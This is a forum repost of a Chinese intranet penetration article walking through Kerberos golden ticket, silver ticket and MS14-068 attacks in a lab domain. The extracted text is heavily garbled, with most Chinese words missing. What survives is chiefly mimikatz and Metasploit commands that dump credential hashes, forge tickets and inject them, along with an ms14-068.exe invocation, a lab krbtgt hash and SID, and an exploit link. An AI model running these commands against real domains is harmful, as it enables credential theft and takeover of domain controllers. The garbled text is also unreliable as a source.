搜索

[18584] 2021-06-26_内网渗透Kerberos协议相关安全问题分析与利用

文档创建者:s7ckTeam
浏览次数:34
最后更新:2025-01-18
2021-06-26_内网渗透Kerberos协议相关安全问题分析与利用   |   K e r b e r o s     W H O A M I   H A C K   2 0 2 1 - 0 6 - 2 6 #   , 2 0 # K e r b e r o s   , 4 #   , 4   |   K e r b e r o s     K e r b e r o s   K e r b e r o s     M S 1 4 - 0 6 8 K e r b e r o s 便   K e r b e r o s   G o l d e n   t i c k e t   W i n d o w s     k e r b e r o s   C l i e n t     K D C   K D C   使   K r b t g t     N T L M     T G T   K r b t g t     N T L M     T G T     K r b t g t   使   K r b t g t     H a s h     T G T K e r b e r o s  
使   S I D k r b t g t     N T L M   i m a g e - 2 0 2 1 0 5 2 2 1 2 0 0 5 8 3 1 5 W i n d o w s   7 I P 1 9 2 . 1 6 8 . 9 3 . 2 0 w h o a m i a n o n y . o r g b u n n y W i n d o w s   S e r v e r   2 0 1 2 I P 1 9 2 . 1 6 8 . 9 3 . 3 0 w h o a m i a n o n y . o r g a d m i n i s t r a t o r   H a s h   K r b t g t     K r b t g t   M i m i k a t z     m i m i k a t z   k r b t g t     H a s h   s i d p r i v i l e g e : : d e b u g l s a d u m p : : l s a   / p a t c h                 / /     h a s h
i m a g e - 2 0 2 1 0 5 2 1 0 8 5 7 4 4 6 0 2   k r b t g t     H a s h       S I D   H a s h   6 b e 5 8 b f c c 0 a 1 6 4 a f 2 4 0 8 d 1 d 3 b d 3 1 3 c 2 a   S I D   S - 1 - 5 - 2 1 - 1 3 1 5 1 3 7 6 6 3 - 3 7 0 6 8 3 7 5 4 4 - 1 4 2 9 0 0 9 1 4 2 W i n d o w s   7   m i m i k a t z     t i c k e t . k i r b i     T G T     a d m i n i s t r a t o r i m a g e - 2 0 2 1 0 5 2 1 0 9 0 4 3 8 0 3 8   T G T     t i c k e t . k i r b i   t i c k e t . k i r b i 使   m i m i k a t z   t i c k e t . k i r b i   k e r b e r o s : : g o l d e n   / u s e r : a d m i n i s t r a t o r   / d o m a i n : w h o a m i a n o n y . o r g   / s i d : S - 1 - 5 - 2 1 - 1 3 1 5 1 3 7 6 6 3 - 3 7 0 6 8 3 7 5 4 4 - 1 4 2 9 0 0 9 1 4 2 #   k e r b e r o s : : g o l d e n   / u s e r :   / d o m a i n :   / s i d : s i d   / k r b t g t :   k r b t g t H a s h   / t i c k e t : t i c k e t . k i r b i
i m a g e - 2 0 2 1 0 5 2 1 0 9 0 7 0 6 4 3 6 i m a g e - 2 0 2 1 0 5 2 1 0 9 1 2 3 0 4 2 1 e x i t 退 m i m i k a t z   W i n d o w s   7   访 i m a g e - 2 0 2 1 0 5 2 1 0 9 2 0 4 7 5 4 5 使   p s e x e c w m i   k e r b e r o s : : p t t   t i c k e t . k i r b i # k e r b e r o s : : p t t   < > k e r b e r o s : : t g t d i r   D C c $
i m a g e - 2 0 2 1 0 5 2 1 0 9 2 4 5 0 4 4 7 M e t a s p l o i t     M e t a s p l o i t     W i n d o w s   7   线   M S F   i m a g e - 2 0 2 1 0 5 2 1 1 1 0 1 5 7 1 1 1   m e t e r p r e t e r     k i w i   l o a d   k i w i
i m a g e - 2 0 2 1 0 5 2 1 1 1 0 4 3 6 9 8 1 i m a g e - 2 0 2 1 0 5 2 1 1 8 5 5 1 2 6 1 9   S h e l l     D C   i m a g e - 2 0 2 1 0 5 2 1 1 8 5 7 3 3 5 0 8 S i l v e r   t i c k e t g o l d e n _ t i c k e t _ c r e a t e   - d   w h o a m i a n o n y . o r g   - k   6 b e 5 8 b f c c 0 a 1 6 4 a f 2 4 0 8 d 1 d 3 b d 3 1 3 c 2 a   - s   S - 1 - 5 - 2 1 - 1 3 1 5 1 3 7 6 6 3 - 3 7 0 6 8 3 7 5 4 4 #   g o l d e n _ t i c k e t _ c r e a t e   - d     - k   k r b t g t H a s h   - s   s i d   - u     - t   / r o o t / k r b t g t . t i c k e t k e r b e r o s _ t i c k e t _ l i s t   #   k e r b e r o s _ t i c k e t _ u s e   / r o o t / k r b t g t . t i c k e t   #   d i r   D C c $
  T G S 访   T G T 使   K D C   K D C     T G T   T G T   2 0 T G S     T G T   使   k r b t g t     S I D   F Q D N   N T L M   i m a g e - 2 0 2 1 0 5 2 2 1 2 0 0 5 8 3 1 5 W i n d o w s   7 I P 1 9 2 . 1 6 8 . 9 3 . 2 0 w h o a m i a n o n y . o r g b u n n y W i n d o w s   S e r v e r   2 0 1 2 I P 1 9 2 . 1 6 8 . 9 3 . 3 0 w h o a m i a n o n y . o r g a d m i n i s t r a t o r 使   C I F S   C I F S   W i n d o w s  
i m a g e - 2 0 2 1 0 5 2 1 0 9 2 9 2 9 7 8 5   N T L M     S H A 1   6 d e c b 5 d 7 5 e b 5 7 2 7 d 8 5 3 5 e 6 7 6 8 0 b 5 2 5 7 1   D C $     N T L M     A d m i n i s t r a t o r     W i n d o w s   7   使   m i m i k a t z         F Q D N   i m a g e - 2 0 2 1 0 5 2 1 0 9 3 6 1 2 6 3 2 访 p r i v i l e g e : : d e b u g s e k u r l s a : : l o g o n p a s s w o r d s k e r b e r o s : : g o l d e n   / d o m a i n : w h o a m i a n o n y . o r g   / s i d : S - 1 - 5 - 2 1 - 1 3 1 5 1 3 7 6 6 3 - 3 7 0 6 8 3 7 5 4 4 - 1 4 2 9 0 0 9 1 4 2   / t a r g e t : D C . w h o a m i a n o n y #   k e r b e r o s : : g o l d e n   / d o m a i n :   / s i d :   S I D   / t a r g e t : F Q D N   / r c 4 : s e r v e r     / s e r v i c e :   / u s e r :   / p t t / t a r g e t d i r   D C . w h o a m i a n o n y . o r g c $                   / /  
i m a g e - 2 0 2 1 0 5 2 1 0 9 3 7 0 1 7 7 4 使   p s e x e c w m i   线 M S 1 4 - 0 6 8   P A C   西   K e r b e r o s   P A C P r i v i l e g e   A t t r i b u t e   C e r t i f i c a t e 西 访 访   K e r b e r o s     P A C   访   T G T   T G T   S T   S T   访 访   " W h o   a m   i ? "     " W h a t   c a n   I   d o ? "   P A C   K D C     C l i e n t         P A C P A C     S I D   S e r v e r     C l i e n t         S e r v e r     P A C     D C   访 D C     P A C     P A C     S I D     A C L     P A C   M S 1 4 - 0 6 8     k d c s v c . d l l   K D C W i n d o w s     T G T     P A C     P A C   T G T     M S 1 4 - 0 6 8   S I D A S _ R E P A P _ R E Q
i m a g e - 2 0 2 1 0 5 2 2 1 2 0 0 5 8 3 1 5 W i n d o w s   7 I P 1 9 2 . 1 6 8 . 9 3 . 2 0 w h o a m i a n o n y . o r g b u n n y W i n d o w s   S e r v e r   2 0 1 2 I P 1 9 2 . 1 6 8 . 9 3 . 3 0 w h o a m i a n o n y . o r g a d m i n i s t r a t o r   M S 1 4 - 0 6 8 . e x e h t t p s : / / g i t h u b . c o m / a b a t c h y 1 7 / W i n d o w s E x p l o i t s / t r e e / m a s t e r / M S 1 4 - 0 6 8   W i n d o w s   7     S I D i m a g e - 2 0 2 1 0 5 2 1 0 9 5 0 1 7 2 2 2   W i n d o w s   7     m s 1 4 - 0 6 8 . e x e   T G T   w h o a m i   / a l l m s 1 4 - 0 6 8 . e x e   - u   b u n n y @ w h o a m i a n o n y . o r g   - s   S - 1 - 5 - 2 1 - 1 3 1 5 1 3 7 6 6 3 - 3 7 0 6 8 3 7 5 4 4 - 1 4 2 9 0 0 9 1 4 2 - 1 1 1 2   - d   1 9 2 . 1 6 8 . 9 3 . 3 0 #   m s 1 4 - 0 6 8 . e x e   - u   @   - s   s i d   - d   i p   - p  
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理